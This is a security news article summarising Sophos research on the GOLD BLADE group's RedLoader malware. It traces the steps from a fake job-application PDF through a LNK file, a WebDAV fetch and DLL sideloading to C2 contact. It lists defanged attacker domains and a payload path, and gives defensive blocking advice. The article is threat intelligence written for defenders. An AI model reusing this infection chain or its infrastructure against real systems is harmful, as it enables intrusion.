GOLD BLADE Unleashes RedLoader with Novel Attack Chain: LNK Files + WebDAV + DLL Sideloading Evades Detection

Sophos analysts have uncovered a newly combined infection technique used by the GOLD BLADE cybercriminal group to deliver their custom RedLoader malware, in what researchers describe as a previously unreported attack sequence that merges multiple known evasion tactics into a cohesive and dangerous new execution chain.

“The combination observed in July 2025 represents a method for initial execution that has not been publicly reported,” Sophos notes, marking a significant evolution in RedLoader’s deployment strategy.

The attack begins with social engineering. GOLD BLADE operators send a malicious PDF masquerading as a job application cover letter via third-party job platforms like Indeed. The PDF contains a malicious link that downloads a ZIP archive, which in turn contains a LNK file disguised as a PDF.

From there, the execution chain proceeds as follows:

1. The LNK file launches conhost.exe, Windows’ console host.
2. This spawns a WebDAV connection to a Cloudflare-hosted domain:
   automatinghrservices[.]workers[.]dev.
3. A signed executable, a renamed version of Adobe’s ADNotificationManager.exe, is pulled from the attacker’s server under the guise of a resume:
   dav[.]automatinghrservices[.]workers[.]dev/SSL/DavWWWRoot/CV-APP-2012-68907872.exe
4. This benign executable sideloads a malicious DLL named netutils.dll, initiating RedLoader stage 1.
5. Stage 1 creates a scheduled task called BrowserQE\BrowserQE_<Base64-encoded computer name> and fetches a standalone stage 2 payload from:
   live[.]airemoteplant[.]workers[.]dev.
6. The task then executes the custom stage 2 binary via PCALua.exe and conhost.exe.
7. Finally, stage 2 establishes command-and-control (C2) communication with attacker infrastructure.

“While this executable name is victim-specific, the SHA256 hash is consistent across all samples observed by Sophos analysts,” the report adds.

While GOLD BLADE has historically used LNK files, WebDAV-hosted payloads, and DLL sideloading, this is the first time they’ve combined all three in a single infection chain.

Sophos notes:

“The July activity shows how threat actors can combine prior techniques to modify their attack chain and bypass defenses.”

This campaign showcases how attackers reuse familiar tools in novel combinations to elude endpoint detection and gain execution on target machines with minimal friction.

Sophos recommends deploying Software Restriction Policies via Group Policy to block .lnk files in commonly abused locations such as:

• C:\Users\*\Downloads\*.lnk
• %AppDataLocal%\*.lnk
• %AppDataRoaming%\*.lnk

Security teams are also urged to review IoCs available in Sophos’s official GitHub repository.

Related Posts:

• Microsoft’s June 2025 Patch Tuesday: 2 Zero-Days, 69 Vulnerabilities Patched!
• Bitcoin Gold Hacked: Lose $18 Million
• Python Developers Beware: Attackers Sneak Malware into Popular Package Manager
• Sophisticated Attacks Employ Cobalt Strike, DLL Sideloading, and Evolving Tactics